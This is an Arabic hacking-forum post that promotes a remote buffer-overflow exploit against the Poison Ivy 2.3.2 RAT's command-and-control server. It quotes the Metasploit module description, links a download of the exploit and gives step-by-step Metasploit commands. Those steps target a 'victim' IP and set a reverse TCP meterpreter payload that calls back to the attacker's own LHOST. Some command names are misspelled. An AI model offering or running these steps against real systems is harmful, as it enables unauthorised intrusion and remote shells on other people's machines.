ثغرة ريموت في برنامج الاختراق الشهير poison
الثغرة في الاصدار الجديد من البرنامج
Poison Ivy 2.3.2
الثغرة في الاصدار الجديد
وهاذا موقع الام
اضغط هنا
للبرنامج وراح تلاحظون الاصدار الجديد هو 2.3.2
والثغرة مصابة في الاصدار الجديد وكمان ممكن تكون مصابة في باقي الاصدارات
الثغرة ريموت
--------------------------------------------------------
ولكن لها شروط
مثلا انت الحين تبي تخترق واحد يستخدم هاذا البرنامج والاصدار 2.3.2
1-تاخذ الاي بي حقه
2-لازم يكون الضحية مجرب السرفر الى انتجه ببرنامح البايزون وجرب على نفسه عشان تقدر تخترقه ريموت زي اما تسوي اتصال ريلكس يتشاركون الضحايا
هو لازم الضحيفة يفتح او يجرب التبليغ على نفسه اكيد راح يجرب على نفسه وانت راح تخترقه يوم يجرب التبليغ
فهمتو ++
----------------------------------------------------
معلومات علي الثغرة
This module exploits a stack Buffer Overflow in Poison Ivy 2.3.2 C&C
server. The exploit does not need to know the password chosen for the
bot/server communication. If the C&C is configured with the default
‘admin’ password, the exploit should work fine. In case of the C&C
configured with another password the exploit can fail. The ‘check’
command can be used to determine if the C&C target is using the
default ‘admin’ password. Hopefully an exploit try won’t crash the
Poison Ivy C&C process, just the thread responsible of handling the
connection. Because of this the module provides the RANDHEADER option
and a bruteforce target. If RANDHEADER is used a random header will be
used. If the brute force target is selected, a random header will be
sent in case the default for the password ‘admin’ doesn’t work.
Bruteforce will stop after 5 tries or a session obtained.
---------------------------------------------------------------------------------------شرح الثغرة وكيف تم تكوينا وشرح مفصل راح تفيدك في اكتشاف ثغرات في برامج الاختراق الاخرى تابع الموضوع تبعه لشرح الثغرة بالتفصيل
اضغط هنا
والثغرة قد تم برمجة لها سكربيت للختراق بها عبر الميتا للتسهيل عملية الاختراق
IIIIII!!!!!!!!
II hacker by mr.hmada II
I metasploit I
I explot I
IIIIII!!!!!!!!
للتحميل الثغرةII hacker by mr.hmada II
I metasploit I
I explot I
IIIIII!!!!!!!!
للتحميل اضغط هنا »
--------------------__---------------------
شرح فديو للثغرة للتوضيح والشرح مقدم من مكتشف الثغرة
الشرح هنا
الحل الجذري من الاختراق
حاول انك لا تستخدمه استخدم برامج الاختراق اخرى مثلا دراك كمانت وبرامج اخرى ثانية غير بايزون
الاوامر المستخدمة في الميتا
use exploit/windows/misc/xxx
xx اسم الثغرة عاد انت الى سميتها وش
set RHOST ip
اي بي الضحية
set PAYLOAD windows/neterpreter/severse_tcp
بيلود
set LHOST IP
الاي بي تبعك
exploit
الاستغلال
وتابعو شرح الثغرة عشان تعرف كيف تستغلها بالكامل
تقبلو تحياتي اخوكم
mr.hmada
في امان الله
ارجاء عدم نقل الموضوع دون ذكر المصدر
لا اسامح الذي نقل الموضوع دون المصدر
